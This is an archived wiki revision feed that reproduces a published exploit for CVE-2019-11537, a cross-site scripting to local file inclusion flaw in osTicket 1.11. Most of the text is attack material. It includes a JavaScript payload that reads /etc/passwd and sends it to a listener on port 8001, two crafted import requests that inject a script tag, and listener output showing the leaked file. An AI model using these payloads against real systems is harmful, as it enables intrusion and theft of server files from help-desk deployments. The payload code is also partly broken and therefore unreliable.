https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2019-11537_osTicket_1.11_XSS%26%E6%9C%AC%E5%9C%B0%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E
CVE-2019-11537 osTicket 1.11 XSS&本地文件包含漏洞 - Revision history
2026-04-10T14:36:31Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2019-11537_osTicket_1.11_XSS%26%E6%9C%AC%E5%9C%B0%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E&diff=2020&oldid=prev
Pwnwiki: Created page with "==EXP== <pre> # Exploit Title: osTicket v1.11 - Cross-Site Scripting to Local File Inclusion # Date: 09.04.2019 # Exploit Author: Özkan Mustafa Akkuş (AkkuS) @ehakkus # Cont..."
2021-05-02T04:40:28Z
<p>Created page with "==EXP== <pre> # Exploit Title: osTicket v1.11 - Cross-Site Scripting to Local File Inclusion # Date: 09.04.2019 # Exploit Author: Özkan Mustafa Akkuş (AkkuS) @ehakkus # Cont..."</p>
<p><b>New page</b></p><div>==EXP==<br />
<pre><br />
# Exploit Title: osTicket v1.11 - Cross-Site Scripting to Local File<br />
Inclusion<br />
# Date: 09.04.2019<br />
# Exploit Author: Özkan Mustafa Akkuş (AkkuS) @ehakkus<br />
# Contact: https://pentest.com.tr<br />
# Vendor Homepage: https://osticket.com<br />
# Software Link: https://github.com/osTicket/osTicket<br />
# References: https://github.com/osTicket/osTicket/pull/4869<br />
# https://pentest.com.tr/exploits/osTicket-v1-11-XSS-to-LFI.html<br />
# Version: v1.11<br />
# Category: Webapps<br />
# Tested on: XAMPP for Linux<br />
# Description: This is exploit proof of concept as XSS attempt can<br />
# lead to an LFI (Local File Inclusion) attack at osTicket.<br />
##################################################################<br />
# PoC<br />
<br />
# There are two different XSS vulnerabilities in the "Import"<br />
field on the Agent Panel - User Directory field. This vulnerability<br />
causes a different vulnerability. The attacker can run the malicious<br />
JS file that he uploads in the XSS vulnerability. Uploaded JS files<br />
can be called clear text. Therefore, attackers do not have to use<br />
a different server to perform an attack. Then it is possible to<br />
create "Local File Inclusion" vulnerability too.<br />
<br />
The attacker can upload a JS file as follows.<br />
------------------------------------------------------------------<br />
<br />
function readTextFile(file)<br />
{<br />
var rawFile = new XMLHttpRequest();<br />
rawFile.open("GET", file, false);<br />
rawFile.onreadystatechange = function ()<br />
{<br />
if(rawFile.readyState === 4)<br />
{<br />
if(rawFile.status === 200 || rawFile.status == 0)<br />
{<br />
var allText = rawFile.responseText;<br />
allText.src = 'http://localhost:8001' +<br />
rawFile.responseText;<br />
document.body.appendChild(allText);<br />
}<br />
}<br />
}<br />
rawFile.send(null);<br />
}<br />
<br />
readTextFile("/etc/passwd");<br />
<br />
------------------------------------------------------------------<br />
<br />
# Smilar JS File Link;<br />
<br />
/upload/file.php?key=y3cxcoxqv8r3miqczzj5ar8rhm1bhcbm<br />
&expires=1554854400&signature=be5cea87c37d7971e0c54164090a391066ecbaca&id=36"<br />
<br />
After this process, we can run the JS file in XSS vulnerability.<br />
<br />
<br />
# Our First Request for XSS to LFI;<br />
------------------------------------------------------------------<br />
<br />
POST /upload/scp/users.php?do=import-users<br />
Host: localhost<br />
Content-Type: multipart/form-data; boundary=---------------------------[]<br />
<br />
<br />
-----------------------------[]<br />
Content-Disposition: form-data; name="__CSRFToken__"<br />
<br />
8f6f85b8d76218112a53f909692f3c4ae7768b39<br />
-----------------------------[]<br />
Content-Disposition: form-data; name="pasted"<br />
<br />
<br />
-----------------------------[]<br />
Content-Disposition: form-data; name="import"; filename="users-20190408.csv"<br />
Content-Type: text/csv<br />
<br />
<script src="<br />
http://localhost/4/osTicket-v1.11/upload/file.php?key=y3cxcoxqv8r3miqczzj5ar8rhm1bhcbm&expires=1554854400&signature=be5cea87c37d7971e0c54164090a391066ecbaca&id=36<br />
"></script><br />
<br />
-----------------------------[]--<br />
<br />
<br />
<br />
<br />
# Our Second Request for XSS to LFI;<br />
------------------------------------------------------------------<br />
POST /upload/scp/ajax.php/users/import HTTP/1.1<br />
Host: localhost<br />
<br />
__CSRFToken__=8f6f85b8d76218112a53f909692f3c4ae7768b39&pasted=%3Cscript+src%3D%22http%3A%2F%2Flocalhost%2F4%2FosTicket-v1.11%2Fupload%2Ffile.php%3Fkey%3Dy3cxcoxqv8r3miqczzj5ar8rhm1bhcbm%26expires%3D1554854400%26signature%3Dbe5cea87c37d7971e0c54164090a391066ecbaca%26id%3D36%22%3E%3C%2Fscript%3E&undefined=Import+Users<br />
------------------------------------------------------------------<br />
<br />
<br />
# After sending XSS requests,<br />
# When the attacker listens to port 8001, he/she will receive a request as<br />
follows.<br />
<br />
root@AkkuS:~# python -m SimpleHTTPServer 8001<br />
Serving HTTP on 0.0.0.0 port 8001 ...<br />
127.0.0.1 - - [09/Apr/2019 11:54:42] "GET / HTTP/1.1" 200 -<br />
127.0.0.1 - - [09/Apr/2019 11:54:42] "GET<br />
/root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin...[More]<br />
<br />
</pre></div>
Pwnwiki